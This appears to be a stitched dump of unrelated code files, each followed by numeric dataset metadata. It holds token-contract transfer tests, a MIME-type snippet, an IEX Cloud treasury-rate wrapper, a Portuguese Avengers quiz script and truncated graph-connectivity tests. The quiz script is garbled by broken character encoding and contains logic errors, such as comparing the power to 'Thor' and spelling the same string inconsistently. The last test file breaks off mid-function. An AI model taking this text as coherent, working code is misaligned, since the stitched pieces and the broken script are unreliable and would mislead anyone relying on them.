gauge_v2.approve(accounts[1], approval_amount, {"from": accounts[0]})
gauge_v2.approve(accounts[2], approval_amount, {"from": accounts[0]})
gauge_v2.transferFrom(accounts[0], accounts[2], transfer_amount, {"from": accounts[1]})
assert gauge_v2.allowance(accounts[0], accounts[2]) == approval_amount
def test_total_supply_not_affected(accounts, gauge_v2):
total_supply = gauge_v2.totalSupply()
amount = gauge_v2.balanceOf(accounts[0])
gauge_v2.approve(accounts[1], amount, {"from": accounts[0]})
gauge_v2.transferFrom(accounts[0], accounts[2], amount, {"from": accounts[1]})
assert gauge_v2.totalSupply() == total_supply
def test_returns_true(accounts, gauge_v2):
amount = gauge_v2.balanceOf(accounts[0])
gauge_v2.approve(accounts[1], amount, {"from": accounts[0]})
tx = gauge_v2.transferFrom(accounts[0], accounts[2], amount, {"from": accounts[1]})
assert tx.return_value is True
def test_transfer_full_balance(accounts, gauge_v2):
amount = gauge_v2.balanceOf(accounts[0])
receiver_balance = gauge_v2.balanceOf(accounts[2])
gauge_v2.approve(accounts[1], amount, {"from": accounts[0]})
gauge_v2.transferFrom(accounts[0], accounts[2], amount, {"from": accounts[1]})
assert gauge_v2.balanceOf(accounts[0]) == 0
assert gauge_v2.balanceOf(accounts[2]) == receiver_balance + amount
def test_transfer_zero_tokens(accounts, gauge_v2):
sender_balance = gauge_v2.balanceOf(accounts[0])
receiver_balance = gauge_v2.balanceOf(accounts[2])
gauge_v2.approve(accounts[1], sender_balance, {"from": accounts[0]})
gauge_v2.transferFrom(accounts[0], accounts[2], 0, {"from": accounts[1]})
assert gauge_v2.balanceOf(accounts[0]) == sender_balance
assert gauge_v2.balanceOf(accounts[2]) == receiver_balance
def test_transfer_zero_tokens_without_approval(accounts, gauge_v2):
sender_balance = gauge_v2.balanceOf(accounts[0])
receiver_balance = gauge_v2.balanceOf(accounts[2])
gauge_v2.transferFrom(accounts[0], accounts[2], 0, {"from": accounts[1]})
assert gauge_v2.balanceOf(accounts[0]) == sender_balance
assert gauge_v2.balanceOf(accounts[2]) == receiver_balance
def test_insufficient_balance(accounts, gauge_v2):
balance = gauge_v2.balanceOf(accounts[0])
gauge_v2.approve(accounts[1], balance + 1, {"from": accounts[0]})
with brownie.reverts():
gauge_v2.transferFrom(accounts[0], accounts[2], balance + 1, {"from": accounts[1]})
def test_insufficient_approval(accounts, gauge_v2):
balance = gauge_v2.balanceOf(accounts[0])
gauge_v2.approve(accounts[1], balance - 1, {"from": accounts[0]})
with brownie.reverts():
gauge_v2.transferFrom(accounts[0], accounts[2], balance, {"from": accounts[1]})
def test_no_approval(accounts, gauge_v2):
balance = gauge_v2.balanceOf(accounts[0])
with brownie.reverts():
gauge_v2.transferFrom(accounts[0], accounts[2], balance, {"from": accounts[1]})
def test_infinite_approval(accounts, gauge_v2):
gauge_v2.approve(accounts[1], 2 ** 256 - 1, {"from": accounts[0]})
gauge_v2.transferFrom(accounts[0], accounts[2], 10000, {"from": accounts[1]})
assert gauge_v2.allowance(accounts[0], accounts[1]) == 2 ** 256 - 1
def test_revoked_approval(accounts, gauge_v2):
balance = gauge_v2.balanceOf(accounts[0])
gauge_v2.approve(accounts[1], balance, {"from": accounts[0]})
gauge_v2.approve(accounts[1], 0, {"from": accounts[0]})
with brownie.reverts():
gauge_v2.transferFrom(accounts[0], accounts[2], balance, {"from": accounts[1]})
def test_transfer_to_self(accounts, gauge_v2):
sender_balance = gauge_v2.balanceOf(accounts[0])
amount = sender_balance // 4
gauge_v2.approve(accounts[0], sender_balance, {"from": accounts[0]})
gauge_v2.transferFrom(accounts[0], accounts[0], amount, {"from": accounts[0]})
assert gauge_v2.balanceOf(accounts[0]) == sender_balance
assert gauge_v2.allowance(accounts[0], accounts[0]) == sender_balance - amount
def test_transfer_to_self_no_approval(accounts, gauge_v2):
amount = gauge_v2.balanceOf(accounts[0])
with brownie.reverts():
gauge_v2.transferFrom(accounts[0], accounts[0], amount, {"from": accounts[0]})
def test_transfer_event_fires(accounts, gauge_v2):
amount = gauge_v2.balanceOf(accounts[0])
gauge_v2.approve(accounts[1], amount, {"from": accounts[0]})
tx = gauge_v2.transferFrom(accounts[0], accounts[2], amount, {"from": accounts[1]})
assert tx.events["Transfer"].values() == [accounts[0], accounts[2], amount]
| 37.005464
| 92
| 0.715298
| 914
| 6,772
| 5.080963
| 0.084245
| 0.143196
| 0.11025
| 0.165375
| 0.853144
| 0.796512
| 0.77627
| 0.742463
| 0.736003
| 0.72696
| 0
| 0.046508
| 0.133196
| 6,772
| 182
| 93
| 37.208791
| 0.744634
| 0.00251
| 0
| 0.54955
| 0
| 0
| 0.027095
| 0
| 0
| 0
| 0
| 0
| 0.153153
| 1
| 0.171171
| false
| 0
| 0.018018
| 0
| 0.189189
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e0166c7c29c0e1918ca5e93f6a26cc9618b5938f
| 116
|
py
|
Python
|
csiep/settings/__init__.py
|
pkucsie/SIEPServer
|
00b0637eb8302135dfc772fccd18cd749a93e5c6
|
[
"Apache-2.0"
] | 2
|
2021-02-12T10:02:42.000Z
|
2021-03-15T13:08:04.000Z
|
csiep/settings/__init__.py
|
pkucsie/SIEPServer
|
00b0637eb8302135dfc772fccd18cd749a93e5c6
|
[
"Apache-2.0"
] | null | null | null |
csiep/settings/__init__.py
|
pkucsie/SIEPServer
|
00b0637eb8302135dfc772fccd18cd749a93e5c6
|
[
"Apache-2.0"
] | null | null | null |
import mimetypes
mimetypes.add_type("text/css", ".css", True)
mimetypes.add_type("text/javascript", ".js", True)
| 29
| 51
| 0.715517
| 16
| 116
| 5.0625
| 0.5625
| 0.296296
| 0.395062
| 0.493827
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.094828
| 116
| 3
| 52
| 38.666667
| 0.771429
| 0
| 0
| 0
| 0
| 0
| 0.265487
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
e032a3aac5c8597910fca3b774559d3982660235
| 17,929
|
py
|
Python
|
pyEX/treasuries/treasuries.py
|
adamklaff/pyEX
|
74a4cfa5978ccff95261aeb54f526dedc579aa6b
|
[
"Apache-2.0"
] | 335
|
2017-11-06T00:45:41.000Z
|
2022-03-14T10:17:36.000Z
|
pyEX/treasuries/treasuries.py
|
adamklaff/pyEX
|
74a4cfa5978ccff95261aeb54f526dedc579aa6b
|
[
"Apache-2.0"
] | 193
|
2018-02-11T21:39:35.000Z
|
2022-02-25T15:46:38.000Z
|
pyEX/treasuries/treasuries.py
|
adamklaff/pyEX
|
74a4cfa5978ccff95261aeb54f526dedc579aa6b
|
[
"Apache-2.0"
] | 92
|
2017-11-10T08:09:35.000Z
|
2022-02-16T19:27:46.000Z
|
# *****************************************************************************
#
# Copyright (c) 2020, the pyEX authors.
#
# This file is part of the pyEX library, distributed under the terms of
# the Apache License 2.0. The full license can be found in the LICENSE file.
#
from enum import Enum
from functools import lru_cache
from ..common import _timeseriesWrapper, _expire, _UTC
from ..timeseries import timeSeries, timeSeriesDF
class TreasuriesPoints(Enum):
"""Treasury data points
https://iexcloud.io/docs/api/#treasuries
Attributes:
THIRTY; 30 Year constant maturity rate
TWENTY; 20 Year constant maturity rate
TEN; 10 Year constant maturity rate
FIVE; 5 Year constant maturity rate
TWO; 2 Year constant maturity rate
ONE; 1 Year constant maturity rate
SIXMONTH; 6 Month constant maturity rate
THREEMONTH; 3 Month constant maturity rate
ONEMONTH; 1 Month constant maturity rate
"""
THIRTY = "DGS30"
TWENTY = "DGS20"
TEN = "DGS10"
SEVEN = "DGS7"
FIVE = "DGS5"
THREE = "DGS3"
TWO = "DGS2"
ONE = "DGS1"
SIXMONTH = "DGS6MO"
THREEMONTH = "DGS3MO"
ONEMONTH = "DGS1MO"
@staticmethod
@lru_cache(1)
def options():
"""Return a list of the available rates points options"""
return list(map(lambda c: c.value, TreasuriesPoints))
@_expire(hour=8, tz=_UTC)
def thirtyYear(
token="", version="stable", filter="", format="json", **timeseries_kwargs
):
"""Rates data
https://iexcloud.io/docs/api/#treasuries
Args:
token (str): Access token
version (str): API version
filter (str): filters: https://iexcloud.io/docs/api/#filter-results
format (str): return format, defaults to json
Supports all kwargs from `pyEX.timeseries.timeSeries`
Returns:
dict or DataFrame: result
"""
_timeseriesWrapper(timeseries_kwargs)
return timeSeries(
id="TREASURY",
key="DGS30",
token=token,
version=version,
filter=filter,
format=format,
**timeseries_kwargs
)
@_expire(hour=8, tz=_UTC)
def thirtyYearDF(
token="", version="stable", filter="", format="json", **timeseries_kwargs
):
"""Rates data
https://iexcloud.io/docs/api/#treasuries
Args:
token (str): Access token
version (str): API version
filter (str): filters: https://iexcloud.io/docs/api/#filter-results
format (str): return format, defaults to json
Supports all kwargs from `pyEX.timeseries.timeSeries`
Returns:
dict or DataFrame: result
"""
_timeseriesWrapper(timeseries_kwargs)
return timeSeriesDF(
id="TREASURY",
key="DGS30",
token=token,
version=version,
filter=filter,
format=format,
**timeseries_kwargs
)
@_expire(hour=8, tz=_UTC)
def twentyYear(
token="", version="stable", filter="", format="json", **timeseries_kwargs
):
"""Rates data
https://iexcloud.io/docs/api/#treasuries
Args:
token (str): Access token
version (str): API version
filter (str): filters: https://iexcloud.io/docs/api/#filter-results
format (str): return format, defaults to json
Supports all kwargs from `pyEX.timeseries.timeSeries`
Returns:
dict or DataFrame: result
"""
_timeseriesWrapper(timeseries_kwargs)
return timeSeries(
id="TREASURY",
key="DGS20",
token=token,
version=version,
filter=filter,
format=format,
**timeseries_kwargs
)
@_expire(hour=8, tz=_UTC)
def twentyYearDF(
token="", version="stable", filter="", format="json", **timeseries_kwargs
):
"""Rates data
https://iexcloud.io/docs/api/#treasuries
Args:
token (str): Access token
version (str): API version
filter (str): filters: https://iexcloud.io/docs/api/#filter-results
format (str): return format, defaults to json
Supports all kwargs from `pyEX.timeseries.timeSeries`
Returns:
dict or DataFrame: result
"""
_timeseriesWrapper(timeseries_kwargs)
return timeSeriesDF(
id="TREASURY",
key="DGS20",
token=token,
version=version,
filter=filter,
format=format,
**timeseries_kwargs
)
@_expire(hour=8, tz=_UTC)
def tenYear(token="", version="stable", filter="", format="json", **timeseries_kwargs):
"""Rates data
https://iexcloud.io/docs/api/#treasuries
Args:
token (str): Access token
version (str): API version
filter (str): filters: https://iexcloud.io/docs/api/#filter-results
format (str): return format, defaults to json
Supports all kwargs from `pyEX.timeseries.timeSeries`
Returns:
dict or DataFrame: result
"""
_timeseriesWrapper(timeseries_kwargs)
return timeSeries(
id="TREASURY",
key="DGS10",
token=token,
version=version,
filter=filter,
format=format,
**timeseries_kwargs
)
@_expire(hour=8, tz=_UTC)
def tenYearDF(
token="", version="stable", filter="", format="json", **timeseries_kwargs
):
"""Rates data
https://iexcloud.io/docs/api/#treasuries
Args:
token (str): Access token
version (str): API version
filter (str): filters: https://iexcloud.io/docs/api/#filter-results
format (str): return format, defaults to json
Supports all kwargs from `pyEX.timeseries.timeSeries`
Returns:
dict or DataFrame: result
"""
_timeseriesWrapper(timeseries_kwargs)
return timeSeriesDF(
id="TREASURY",
key="DGS10",
token=token,
version=version,
filter=filter,
format=format,
**timeseries_kwargs
)
@_expire(hour=8, tz=_UTC)
def sevenYear(
token="", version="stable", filter="", format="json", **timeseries_kwargs
):
"""Rates data
https://iexcloud.io/docs/api/#treasuries
Args:
token (str): Access token
version (str): API version
filter (str): filters: https://iexcloud.io/docs/api/#filter-results
format (str): return format, defaults to json
Supports all kwargs from `pyEX.timeseries.timeSeries`
Returns:
dict or DataFrame: result
"""
_timeseriesWrapper(timeseries_kwargs)
return timeSeries(
id="TREASURY",
key="DGS7",
token=token,
version=version,
filter=filter,
format=format,
**timeseries_kwargs
)
@_expire(hour=8, tz=_UTC)
def sevenYearDF(
token="", version="stable", filter="", format="json", **timeseries_kwargs
):
"""Rates data
https://iexcloud.io/docs/api/#treasuries
Args:
token (str): Access token
version (str): API version
filter (str): filters: https://iexcloud.io/docs/api/#filter-results
format (str): return format, defaults to json
Supports all kwargs from `pyEX.timeseries.timeSeries`
Returns:
dict or DataFrame: result
"""
_timeseriesWrapper(timeseries_kwargs)
return timeSeriesDF(
id="TREASURY",
key="DGS7",
token=token,
version=version,
filter=filter,
format=format,
**timeseries_kwargs
)
@_expire(hour=8, tz=_UTC)
def fiveYear(token="", version="stable", filter="", format="json", **timeseries_kwargs):
"""Rates data
https://iexcloud.io/docs/api/#treasuries
Args:
token (str): Access token
version (str): API version
filter (str): filters: https://iexcloud.io/docs/api/#filter-results
format (str): return format, defaults to json
Supports all kwargs from `pyEX.timeseries.timeSeries`
Returns:
dict or DataFrame: result
"""
_timeseriesWrapper(timeseries_kwargs)
return timeSeries(
id="TREASURY",
key="DGS5",
token=token,
version=version,
filter=filter,
format=format,
**timeseries_kwargs
)
@_expire(hour=8, tz=_UTC)
def fiveYearDF(
token="", version="stable", filter="", format="json", **timeseries_kwargs
):
"""Rates data
https://iexcloud.io/docs/api/#treasuries
Args:
token (str): Access token
version (str): API version
filter (str): filters: https://iexcloud.io/docs/api/#filter-results
format (str): return format, defaults to json
Supports all kwargs from `pyEX.timeseries.timeSeries`
Returns:
dict or DataFrame: result
"""
_timeseriesWrapper(timeseries_kwargs)
return timeSeriesDF(
id="TREASURY",
key="DGS5",
token=token,
version=version,
filter=filter,
format=format,
**timeseries_kwargs
)
@_expire(hour=8, tz=_UTC)
def threeYear(
token="", version="stable", filter="", format="json", **timeseries_kwargs
):
"""Rates data
https://iexcloud.io/docs/api/#treasuries
Args:
token (str): Access token
version (str): API version
filter (str): filters: https://iexcloud.io/docs/api/#filter-results
format (str): return format, defaults to json
Supports all kwargs from `pyEX.timeseries.timeSeries`
Returns:
dict or DataFrame: result
"""
_timeseriesWrapper(timeseries_kwargs)
return timeSeries(
id="TREASURY",
key="DGS3",
token=token,
version=version,
filter=filter,
format=format,
**timeseries_kwargs
)
@_expire(hour=8, tz=_UTC)
def threeYearDF(
token="", version="stable", filter="", format="json", **timeseries_kwargs
):
"""Rates data
https://iexcloud.io/docs/api/#treasuries
Args:
token (str): Access token
version (str): API version
filter (str): filters: https://iexcloud.io/docs/api/#filter-results
format (str): return format, defaults to json
Supports all kwargs from `pyEX.timeseries.timeSeries`
Returns:
dict or DataFrame: result
"""
_timeseriesWrapper(timeseries_kwargs)
return timeSeriesDF(
id="TREASURY",
key="DGS3",
token=token,
version=version,
filter=filter,
format=format,
**timeseries_kwargs
)
@_expire(hour=8, tz=_UTC)
def twoYear(token="", version="stable", filter="", format="json", **timeseries_kwargs):
"""Rates data
https://iexcloud.io/docs/api/#treasuries
Args:
token (str): Access token
version (str): API version
filter (str): filters: https://iexcloud.io/docs/api/#filter-results
format (str): return format, defaults to json
Supports all kwargs from `pyEX.timeseries.timeSeries`
Returns:
dict or DataFrame: result
"""
_timeseriesWrapper(timeseries_kwargs)
return timeSeries(
id="TREASURY",
key="DGS2",
token=token,
version=version,
filter=filter,
format=format,
**timeseries_kwargs
)
@_expire(hour=8, tz=_UTC)
def twoYearDF(
token="", version="stable", filter="", format="json", **timeseries_kwargs
):
"""Rates data
https://iexcloud.io/docs/api/#treasuries
Args:
token (str): Access token
version (str): API version
filter (str): filters: https://iexcloud.io/docs/api/#filter-results
format (str): return format, defaults to json
Supports all kwargs from `pyEX.timeseries.timeSeries`
Returns:
dict or DataFrame: result
"""
_timeseriesWrapper(timeseries_kwargs)
return timeSeriesDF(
id="TREASURY",
key="DGS2",
token=token,
version=version,
filter=filter,
format=format,
**timeseries_kwargs
)
@_expire(hour=8, tz=_UTC)
def oneYear(token="", version="stable", filter="", format="json", **timeseries_kwargs):
"""Rates data
https://iexcloud.io/docs/api/#treasuries
Args:
token (str): Access token
version (str): API version
filter (str): filters: https://iexcloud.io/docs/api/#filter-results
format (str): return format, defaults to json
Supports all kwargs from `pyEX.timeseries.timeSeries`
Returns:
dict or DataFrame: result
"""
_timeseriesWrapper(timeseries_kwargs)
return timeSeries(
id="TREASURY",
key="DGS1",
token=token,
version=version,
filter=filter,
format=format,
**timeseries_kwargs
)
@_expire(hour=8, tz=_UTC)
def oneYearDF(
token="", version="stable", filter="", format="json", **timeseries_kwargs
):
"""Rates data
https://iexcloud.io/docs/api/#treasuries
Args:
token (str): Access token
version (str): API version
filter (str): filters: https://iexcloud.io/docs/api/#filter-results
format (str): return format, defaults to json
Supports all kwargs from `pyEX.timeseries.timeSeries`
Returns:
dict or DataFrame: result
"""
_timeseriesWrapper(timeseries_kwargs)
return timeSeriesDF(
id="TREASURY",
key="DGS1",
token=token,
version=version,
filter=filter,
format=format,
**timeseries_kwargs
)
@_expire(hour=8, tz=_UTC)
def sixMonth(token="", version="stable", filter="", format="json", **timeseries_kwargs):
"""Rates data
https://iexcloud.io/docs/api/#treasuries
Args:
token (str): Access token
version (str): API version
filter (str): filters: https://iexcloud.io/docs/api/#filter-results
format (str): return format, defaults to json
Supports all kwargs from `pyEX.timeseries.timeSeries`
Returns:
dict or DataFrame: result
"""
_timeseriesWrapper(timeseries_kwargs)
return timeSeries(
id="TREASURY",
key="DGS6MO",
token=token,
version=version,
filter=filter,
format=format,
**timeseries_kwargs
)
@_expire(hour=8, tz=_UTC)
def sixMonthDF(
token="", version="stable", filter="", format="json", **timeseries_kwargs
):
"""Rates data
https://iexcloud.io/docs/api/#treasuries
Args:
token (str): Access token
version (str): API version
filter (str): filters: https://iexcloud.io/docs/api/#filter-results
format (str): return format, defaults to json
Supports all kwargs from `pyEX.timeseries.timeSeries`
Returns:
dict or DataFrame: result
"""
_timeseriesWrapper(timeseries_kwargs)
return timeSeriesDF(
id="TREASURY",
key="DGS6MO",
token=token,
version=version,
filter=filter,
format=format,
**timeseries_kwargs
)
@_expire(hour=8, tz=_UTC)
def threeMonth(
token="", version="stable", filter="", format="json", **timeseries_kwargs
):
"""Rates data
https://iexcloud.io/docs/api/#treasuries
Args:
token (str): Access token
version (str): API version
filter (str): filters: https://iexcloud.io/docs/api/#filter-results
format (str): return format, defaults to json
Supports all kwargs from `pyEX.timeseries.timeSeries`
Returns:
dict or DataFrame: result
"""
_timeseriesWrapper(timeseries_kwargs)
return timeSeries(
id="TREASURY",
key="DGS3MO",
token=token,
version=version,
filter=filter,
format=format,
**timeseries_kwargs
)
@_expire(hour=8, tz=_UTC)
def threeMonthDF(
token="", version="stable", filter="", format="json", **timeseries_kwargs
):
"""Rates data
https://iexcloud.io/docs/api/#treasuries
Args:
token (str): Access token
version (str): API version
filter (str): filters: https://iexcloud.io/docs/api/#filter-results
format (str): return format, defaults to json
Supports all kwargs from `pyEX.timeseries.timeSeries`
Returns:
dict or DataFrame: result
"""
_timeseriesWrapper(timeseries_kwargs)
return timeSeriesDF(
id="TREASURY",
key="DGS3MO",
token=token,
version=version,
filter=filter,
format=format,
**timeseries_kwargs
)
@_expire(hour=8, tz=_UTC)
def oneMonth(token="", version="stable", filter="", format="json", **timeseries_kwargs):
"""Rates data
https://iexcloud.io/docs/api/#treasuries
Args:
token (str): Access token
version (str): API version
filter (str): filters: https://iexcloud.io/docs/api/#filter-results
format (str): return format, defaults to json
Supports all kwargs from `pyEX.timeseries.timeSeries`
Returns:
dict or DataFrame: result
"""
_timeseriesWrapper(timeseries_kwargs)
return timeSeries(
id="TREASURY",
key="DGS1MO",
token=token,
version=version,
filter=filter,
format=format,
**timeseries_kwargs
)
@_expire(hour=8, tz=_UTC)
def oneMonthDF(
token="", version="stable", filter="", format="json", **timeseries_kwargs
):
"""Rates data
https://iexcloud.io/docs/api/#treasuries
Args:
token (str): Access token
version (str): API version
filter (str): filters: https://iexcloud.io/docs/api/#filter-results
format (str): return format, defaults to json
Supports all kwargs from `pyEX.timeseries.timeSeries`
Returns:
dict or DataFrame: result
"""
_timeseriesWrapper(timeseries_kwargs)
return timeSeriesDF(
id="TREASURY",
key="DGS1MO",
token=token,
version=version,
filter=filter,
format=format,
**timeseries_kwargs
)
| 24.936022
| 88
| 0.612248
| 1,926
| 17,929
| 5.628245
| 0.071651
| 0.073063
| 0.062269
| 0.078875
| 0.90369
| 0.90369
| 0.898985
| 0.898985
| 0.898985
| 0.898985
| 0
| 0.006287
| 0.263651
| 17,929
| 718
| 89
| 24.970752
| 0.814801
| 0.462658
| 0
| 0.797468
| 0
| 0
| 0.064867
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.072785
| false
| 0
| 0.012658
| 0
| 0.196203
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0edbb9e89b30ccb55617f13ea9979f0d55cc32a5
| 4,980
|
py
|
Python
|
Estrutura condicional/Vingadores.py
|
ThiagoAciole/Logica_Algoritimos_Python
|
f687d09d0f90d6b0c349bcd1fada4c9cc6516a92
|
[
"MIT"
] | null | null | null |
Estrutura condicional/Vingadores.py
|
ThiagoAciole/Logica_Algoritimos_Python
|
f687d09d0f90d6b0c349bcd1fada4c9cc6516a92
|
[
"MIT"
] | null | null | null |
Estrutura condicional/Vingadores.py
|
ThiagoAciole/Logica_Algoritimos_Python
|
f687d09d0f90d6b0c349bcd1fada4c9cc6516a92
|
[
"MIT"
] | null | null | null |
#Vingadores
lista = ["Homem de Ferro", "Hulk", "Capitão América", "Thor", "Gavião Arqueiro", "Viúva Negra"]
vingador = str(input())
if vingador in lista:
poder = str(input())
energia = int(input())
if vingador not in lista:
print("Vingador Inv�lido")
else:
if vingador == "Homem de Ferro":
if poder != "Armadura de Ferro":
print("Homem de Ferro NAO conseguiu derrotar Thanos")
if (poder == "Armadura de Ferro" and energia >= 10):
print("Homem de Ferro conseguiu derrotar Thanos")
if poder == "Armadura de Ferro" and energia < 10:
print("Homem de Ferro NAO conseguiu derrotar o Thanos, chamem outro Vingador")
if poder == "For�a Bruta":
print("Esse � o poder do Hulk")
if poder == "Escudo":
print("Esse � o poder do Capit�o Am�rica")
if poder == "Martelo":
print("Esse � o poder do Thor")
if poder == "Arco e Flecha":
print("Esse � o poder do Gavi�o Arqueiro")
if poder == "Inteligencia":
print("Esse � o poder do Vi�va Negra")
if vingador == "Hulk":
if poder != "For�a Bruta":
print("Hulk NAO conseguiu derrotar Thanos")
if poder == "For�a Bruta" and energia >= 5:
print("Hulk conseguiu derrotar Thanos")
if poder == "For�a Bruta" and energia < 5:
print("Hulk NAO conseguiu derrotar o Thanos, chamem outro Vingador")
if poder == "Armadura de Ferro":
print("Esse � o poder do Homem de Ferro")
if poder == "Escudo":
print("Esse � o poder do Capit�o Am�rica")
if poder == "Martelo":
print("Esse � o poder do Thor")
if poder == "Arco e Flecha":
print("Esse � o poder do Gavi�o Arqueiro")
if poder == "Inteligencia":
print("Esse � o poder do Vi�va Negra")
if vingador == "Capit�o Am�rica":
if poder != "Escudo":
print("Capit�o Am�rica NAO conseguiu derrotar Thanos")
if poder == "Escudo" and energia >= 7:
print("Capit�o Am�rica conseguiu derrotar Thanos")
if poder == "For�a Bruta":
print("Esse � o poder do Hulk")
if poder == "Escudo" and energia < 7:
print("Capit�o Am�rica NAO conseguiu derrotar o Thanos, chamem outro Vingador")
if poder == "Armadura de Ferro":
print("Esse � o poder do Homem de Ferro")
if poder == "Martelo":
print("Esse � o poder do Thor")
if poder == "Arco e Flecha":
print("Esse � o poder do Gavi�o Arqueiro")
if poder == "Inteligencia":
print("Esse � o poder do Vi�va Negra")
if vingador == "Thor":
if poder != "Martelo":
print("Thor NAO conseguiu derrotar Thanos")
if vingador == "Thor" and poder == "Martelo" and energia >= 4:
print("Thor conseguiu derrotar Thanos")
if poder == "For�a Bruta":
print("Esse � o poder do Hulk")
if poder == "Thor" and energia < 4:
print("Thor NAO conseguiu derrotar o Thanos, chamem outro Vingador")
if poder == "Escudo":
print("Esse � o poder do Capit�o Am�rica")
if poder == "Armadura de Ferro":
print("Esse � o poder do Homem de Ferro")
if poder == "Arco e Flecha":
print("Esse � o poder do Gavi�o Arqueiro")
if poder == "Inteligencia":
print("Esse � o poder do Vi�va Negra")
elif vingador == "Gavi�o Arqueiro":
if poder != "Arco e Flecha":
print("Gavi�o Arqueiro NAO conseguiu derrotar Thanos")
if vingador == "Gavi�o Arqueiro" and poder == "Arco e Flecha" and energia >= 12:
print("Gavi�o Arqueiro conseguiu derrotar Thanos")
if poder == "Gavi�o Arqueiro" and energia < 12:
print("Gavi�o Arqueiro NAO conseguiu derrotar o Thanos, chamem outro Vingador")
if poder == "For�a Bruta":
print("Esse � o poder do Hulk")
if poder == "Escudo":
print("Esse � o poder do Capit�o Am�rica")
if poder == "Martelo":
print("Esse � o poder do Thor")
if poder == "Armadura de Ferro":
print("Esse � o poder do Homem de Ferro")
if poder == "Inteligencia":
print("Esse � o poder do Vi�va Negra")
if vingador == "Vi�va Negra":
if poder != "Intelig�ncia":
print("Vi�va Negra NAO conseguiu derrotar Thanos")
if poder == "Intelig�ncia" and energia >= 20:
print("Viuva Negra conseguiu derrotar Thanos")
if poder == "Intelig�ncia" and energia < 20:
print("Vi�va Negra NAO conseguiu derrotar Thanos, chamem outro Vingador")
if poder == "For�a Bruta":
print("Esse � o poder do Hulk")
if poder == "Escudo":
print("Esse � o poder do Capit�o Am�rica")
if poder == "Martelo":
print("Esse � o poder do Thor")
if poder == "Arco e Flecha":
print("Esse � o poder do Gavi�o Arqueiro")
if poder == "Armadura de Ferro":
print("Esse � o poder do Homem de Ferro")
| 41.848739
| 95
| 0.579317
| 757
| 4,980
| 3.915456
| 0.083223
| 0.033738
| 0.101215
| 0.111336
| 0.908907
| 0.853914
| 0.815115
| 0.800945
| 0.759784
| 0.74359
| 0.015863
| 0.005138
| 0.296586
| 4,980
| 119
| 96
| 41.84874
| 0.818441
| 0.002008
| 0
| 0.545455
| 0
| 0
| 0.482294
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.445455
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
0ef6c87e77db784601b0dd129410452baea2c239
| 2,655
|
py
|
Python
|
tests/test_full_adaptive.py
|
FilipKlaesson/cops
|
67d2e5dd4534b3f3eec95b6cfda9d4c9c1746ef0
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_full_adaptive.py
|
FilipKlaesson/cops
|
67d2e5dd4534b3f3eec95b6cfda9d4c9c1746ef0
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_full_adaptive.py
|
FilipKlaesson/cops
|
67d2e5dd4534b3f3eec95b6cfda9d4c9c1746ef0
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
from cops.graph import Graph
from cops.problem import ConnectivityProblem
def import_gurobi():
try:
import gurobipy
return True
except ModuleNotFoundError as e:
return False
def test_horiz1():
G = Graph()
connectivity_edges = [0, 1, 2, 3] # directed connectivity path (one way)
transition_edges = [0, 1, 2, 3] # directed transition path (one way)
# Add edges to graph
G.add_transition_path(transition_edges)
G.add_connectivity_path(connectivity_edges)
# Set initial position of agents
agent_positions = {0: 0, 1: 1, 2: 3} # agent:position
# Init agents in graphs
G.init_agents(agent_positions)
# Set up the connectivity problem
cp = ConnectivityProblem()
# Specify graph
cp.graph = G
# Specify time horizon
cp.T = 1
# Specify sources
cp.src = [2]
cp.static_agents = [2]
if import_gurobi():
cp.solve_adaptive()
# positions of robot 0
np.testing.assert_equal(cp.traj[0, 0], 0)
np.testing.assert_equal(cp.traj[0, 1], 1)
# positions of robot 1
np.testing.assert_equal(cp.traj[1, 0], 1)
np.testing.assert_equal(cp.traj[1, 1], 2)
# positions of robot 2 (fixed)
np.testing.assert_equal(cp.traj[2, 0], 3)
np.testing.assert_equal(cp.traj[2, 1], 3)
def test_horiz2():
G = Graph()
connectivity_edges = [0, 1, 2, 3] # directed connectivity path (one way)
transition_edges = [0, 1, 2, 3] # directed transition path (one way)
# Add edges to graph
G.add_transition_path(transition_edges)
G.add_connectivity_path(connectivity_edges)
# Set initial position of agents
agent_positions = {0: 0, 1: 1, 2: 3} # agent:position
# Init agents in graphs
G.init_agents(agent_positions)
# Set up the connectivity problem
cp = ConnectivityProblem()
# Specify graph
cp.graph = G
# Specify time horizon
cp.T = 2
# Specify sources
cp.src = [2]
cp.static_agents = [0, 2]
if import_gurobi():
cp.solve_adaptive()
# positions of robot 0
np.testing.assert_equal(cp.traj[0, 0], 0)
np.testing.assert_equal(cp.traj[0, 1], 0)
np.testing.assert_equal(cp.traj[0, 2], 0)
# positions of robot 1
np.testing.assert_equal(cp.traj[1, 0], 1)
np.testing.assert_equal(cp.traj[1, 1], 2)
np.testing.assert_equal(cp.traj[1, 2], 1)
# positions of robot 2 (fixed)
np.testing.assert_equal(cp.traj[2, 0], 3)
